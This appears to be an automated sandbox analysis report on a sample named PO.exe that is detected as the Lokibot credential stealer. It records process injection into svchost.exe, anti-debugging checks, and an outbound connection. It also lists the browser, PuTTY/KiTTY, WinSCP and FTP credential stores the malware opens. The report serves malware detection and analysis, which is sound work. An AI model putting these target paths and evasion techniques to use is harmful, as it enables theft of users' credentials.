Source: PO.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: PO.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: PO.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wntdll.pdbUGP source: PO.exe, 00000000.00000003.2075601379.0000000003AD0000.00000004.00001000.00020000.00000000.sdmp, PO.exe, 00000000.00000003.2074553157.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: PO.exe, 00000000.00000003.2075601379.0000000003AD0000.00000004.00001000.00020000.00000000.sdmp, PO.exe, 00000000.00000003.2074553157.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: svchost.exe, svchost.exe, 00000002.00000002.3314409052.0000000000301000.00000020.00000001.01000000.00000005.sdmp
Source:	Binary string: svchost.pdbUGP source: svchost.exe, 00000002.00000002.3314409052.0000000000301000.00000020.00000001.01000000.00000005.sdmp

Source: PO.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: PO.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: PO.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: PO.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: PO.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Yara detected aPLib compressed binary

Source: Yara match	File source: 0.2.PO.exe.b90000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO.exe.b90000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.3314480004.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2088699683.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO.exe PID: 6632, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 320, type: MEMORYSTR

Source: C:\Users\user\Desktop\PO.exe

Code function: 0_2_00994B37 LoadLibraryA,GetProcAddress,

0_2_00994B37

Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_009B8945 push ecx; ret	0_2_009B8958
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402AC0 push eax; ret	2_2_00402AD4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402AC0 push eax; ret	2_2_00402AFC

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00303360 I_RegisterSvchostNotificationCallback,StartServiceCtrlDispatcherW,ExitProcess,

2_2_00303360

Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_009948D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_009948D7
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_00A15376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00A15376

Source: C:\Users\user\Desktop\PO.exe

Code function: 0_2_009B3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_009B3187

Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\PO.exe

API/Special instruction interceptor: Address: AF3254

Source: C:\Users\user\Desktop\PO.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-105834

Source: C:\Users\user\Desktop\PO.exe

API coverage: 4.6 %

Source: C:\Windows\SysWOW64\svchost.exe TID: 5276

Thread sleep time: -360000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_009F445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_009F445A
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_009FC6D1 FindFirstFileW,FindClose,	0_2_009FC6D1
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_009FC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_009FC75C
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_009FEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_009FEF95
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_009FF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_009FF0F2
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_009FF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_009FF3F3
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_009F37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_009F37EF
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_009F3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_009F3B12
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_009FBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_009FBCBC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,	2_2_00403D74

Source: C:\Users\user\Desktop\PO.exe

Code function: 0_2_009949A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_009949A0

Source: C:\Windows\SysWOW64\svchost.exe

Thread delayed: delay time: 60000

Jump to behavior

Source: svchost.exe, 00000002.00000002.3314755505.0000000003000000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\PO.exe

API call chain: ExitProcess graph end node

graph_0-104601

Source: C:\Users\user\Desktop\PO.exe

Code function: 0_2_00A03F09 BlockInput,

0_2_00A03F09

Source: C:\Users\user\Desktop\PO.exe

Code function: 0_2_00993B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00993B3A

Source: C:\Users\user\Desktop\PO.exe

Code function: 0_2_009C5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_009C5A7C

Source: C:\Users\user\Desktop\PO.exe

Code function: 0_2_00994B37 LoadLibraryA,GetProcAddress,

0_2_00994B37

Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_00AF34C0 mov eax, dword ptr fs:[00000030h]	0_2_00AF34C0
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_00AF3520 mov eax, dword ptr fs:[00000030h]	0_2_00AF3520
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_00AF1E70 mov eax, dword ptr fs:[00000030h]	0_2_00AF1E70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003056A0 mov eax, dword ptr fs:[00000030h]	2_2_003056A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003056A0 mov ecx, dword ptr fs:[00000030h]	2_2_003056A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00304610 mov eax, dword ptr fs:[00000030h]	2_2_00304610
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00304610 mov eax, dword ptr fs:[00000030h]	2_2_00304610
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00304610 mov eax, dword ptr fs:[00000030h]	2_2_00304610
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00304610 mov eax, dword ptr fs:[00000030h]	2_2_00304610
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00304410 mov eax, dword ptr fs:[00000030h]	2_2_00304410
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00304410 mov eax, dword ptr fs:[00000030h]	2_2_00304410
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00303060 mov eax, dword ptr fs:[00000030h]	2_2_00303060
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00303060 mov eax, dword ptr fs:[00000030h]	2_2_00303060
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00303060 mov eax, dword ptr fs:[00000030h]	2_2_00303060
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00303060 mov eax, dword ptr fs:[00000030h]	2_2_00303060
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00303540 mov eax, dword ptr fs:[00000030h]	2_2_00303540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00303540 mov eax, dword ptr fs:[00000030h]	2_2_00303540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00303540 mov eax, dword ptr fs:[00000030h]	2_2_00303540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040317B mov eax, dword ptr fs:[00000030h]	2_2_0040317B

Source: C:\Users\user\Desktop\PO.exe

Code function: 0_2_009E80A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

0_2_009E80A9

Source: C:\Windows\SysWOW64\svchost.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_009BA124 SetUnhandledExceptionFilter,	0_2_009BA124
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_009BA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_009BA155
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003033C0 NtSetInformationProcess,SetUnhandledExceptionFilter,SetErrorMode,GetProcessHeap,InitializeSRWLock,InitializeSRWLock,RegDisablePredefinedCacheEx,EtwEventRegister,GetCommandLineW,memset,GetCurrentProcess,NtSetInformationProcess,HeapFree,HeapFree,ExitProcess,GetCurrentProcess,SetProcessAffinityUpdateMode,	2_2_003033C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00305848 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00305848

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\svchost.exe

Network Connect: 104.21.96.1 80

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\PO.exe

Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\PO.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 2DD5008

Jump to behavior

Source: C:\Users\user\Desktop\PO.exe

Code function: 0_2_009E87B1 LogonUserW,

0_2_009E87B1

Source: C:\Users\user\Desktop\PO.exe

Code function: 0_2_00993B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00993B3A

Source: C:\Users\user\Desktop\PO.exe

Code function: 0_2_009948D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_009948D7

Source: C:\Users\user\Desktop\PO.exe

Code function: 0_2_009F4C27 mouse_event,

0_2_009F4C27

Source: C:\Users\user\Desktop\PO.exe

Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO.exe"

Jump to behavior

Source: C:\Users\user\Desktop\PO.exe

Code function: 0_2_009E7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_009E7CAF

Source: C:\Users\user\Desktop\PO.exe

Code function: 0_2_009E874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_009E874B

Source: PO.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: PO.exe	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\Desktop\PO.exe

Code function: 0_2_009B862B cpuid

0_2_009B862B

Source: C:\Users\user\Desktop\PO.exe

Code function: 0_2_009C4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_009C4E87

Source: C:\Users\user\Desktop\PO.exe

Code function: 0_2_009D1E06 GetUserNameW,

0_2_009D1E06

Source: C:\Users\user\Desktop\PO.exe

Code function: 0_2_009C3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_009C3F3A

Source: C:\Users\user\Desktop\PO.exe

Code function: 0_2_009949A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_009949A0

Source: C:\Windows\SysWOW64\svchost.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO.exe.b90000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.3314480004.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2088699683.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO.exe PID: 6632, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 320, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\svchost.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\SysWOW64\svchost.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
